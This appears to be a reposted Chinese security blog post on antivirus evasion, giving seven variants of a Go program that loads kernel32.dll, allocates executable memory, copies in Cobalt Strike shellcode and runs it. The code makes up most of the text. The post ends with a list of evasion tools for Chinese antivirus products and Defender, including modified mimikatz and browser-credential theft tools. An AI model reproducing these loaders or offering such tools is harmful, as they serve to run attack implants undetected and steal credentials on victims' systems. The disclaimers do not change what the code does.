请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
立即加载dll
main.go
package mainimport ("syscall""unsafe")func main() {handle, err := syscall.LoadLibrary("kernel32.dll")if err != nil {return}VirtualAlloc, err := syscall.GetProcAddress(handle, "VirtualAlloc")if err != nil {return}RtlMoveMemory, err := syscall.GetProcAddress(handle, "RtlMoveMemory")if err != nil {return}// cs的shellcodesc := []byte{0xfc, 0x48, 0x83,....}addr, _, _ := syscall.SyscallN(VirtualAlloc, 0, uintptr(len(sc)), 0x1000|0x2000, 0x40)syscall.SyscallN(RtlMoveMemory, addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)syscall.Close(handle)}
编译运行
这是对第一种的封装
main.go
package mainimport ("syscall""unsafe")func main() {handle, err := syscall.LoadDLL("kernel32.dll")if err != nil {return}VirtualAlloc, err := handle.FindProc("VirtualAlloc")if err != nil {return}RtlMoveMemory, err := handle.FindProc("RtlMoveMemory")if err != nil {return}// cs的shellcodesc := []byte{0xfc, 0x48, 0x83, ...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
针对上面的再次进一步封装
main.go
package mainimport ("syscall""unsafe")func main() {handle := syscall.MustLoadDLL("kernel32.dll")VirtualAlloc := handle.MustFindProc("VirtualAlloc")RtlMoveMemory := handle.MustFindProc("RtlMoveMemory")// cs的shellcodesc := []byte{0xfc, 0x48, 0x83, ...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
懒加载
main.go
package mainimport ("syscall""unsafe")func main() {handle := syscall.NewLazyDLL("kernel32.dll")VirtualAlloc := handle.NewProc("VirtualAlloc")RtlMoveMemory := handle.NewProc("RtlMoveMemory")// cs的shellcodesc := []byte{0xfc, 0x48, 0x83, ...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
懒加载, 第三方包只能加载Windows的dll, 而syscall可以加载so文件
立即加载
main.go
package mainimport ("golang.org/x/sys/windows""syscall""unsafe")func main() {handle := windows.MustLoadDLL("kernel32.dll")VirtualAlloc := handle.MustFindProc("VirtualAlloc")RtlMoveMemory := handle.MustFindProc("RtlMoveMemory")// cs的shellcodesc := []byte{0xfc, 0x48, 0x83,...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
懒加载, 第三方包只能加载Windows的dll, 而syscall可以加载so文件
懒加载
main.go
package mainimport ("golang.org/x/sys/windows""syscall""unsafe")func main() {handle := windows.NewLazyDLL("kernel32.dll")VirtualAlloc := handle.NewProc("VirtualAlloc")RtlMoveMemory := handle.NewProc("RtlMoveMemory")// cs的shellcodesc := []byte{0xfc, 0x48, 0x83, ...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
懒加载, NewLazySystemDLL只加载系统dll, 比NewLazyDLL快一点
main.go
package mainimport ("golang.org/x/sys/windows""syscall""unsafe")func main() {handle := windows.NewLazySystemDLL("kernel32.dll")VirtualAlloc := handle.NewProc("VirtualAlloc")RtlMoveMemory := handle.NewProc("RtlMoveMemory")// cs的shellcodesc := []byte{0xfc, 0x48, 0x83, ...}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)}
编译运行
目前已经更新的免杀内容
-
360免杀马生成器
-
火绒免杀马生成器
-
defender免杀马生成器
-
fscan免杀版
-
mimikatz免杀版, 实战可过亚信
-
HackBrowserData免杀版
-
内网多级代理工具免杀版
-
360添加用户免杀版
-
360永久免杀分离加载器
-
火绒添加用户免杀方法
-
360传输报毒解决方案
-
白加黑批量挖掘工具
-
CheckGoBuild.exe fuzz go编译参数工具
-
白加黑武器化工具GenDLLFile.exe
-
x步云沙箱环境信息获取工具
-
sctool.exe处理shellcode文件工具
-
FileEntropyAnalyzer一款查看文件熵值的工具
-
大白哥版二开cs
-
会持续一直更新免杀
等等....
原文始发于微信公众号(Sec探索者):【免杀】go语言调用windows api的多种方式
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论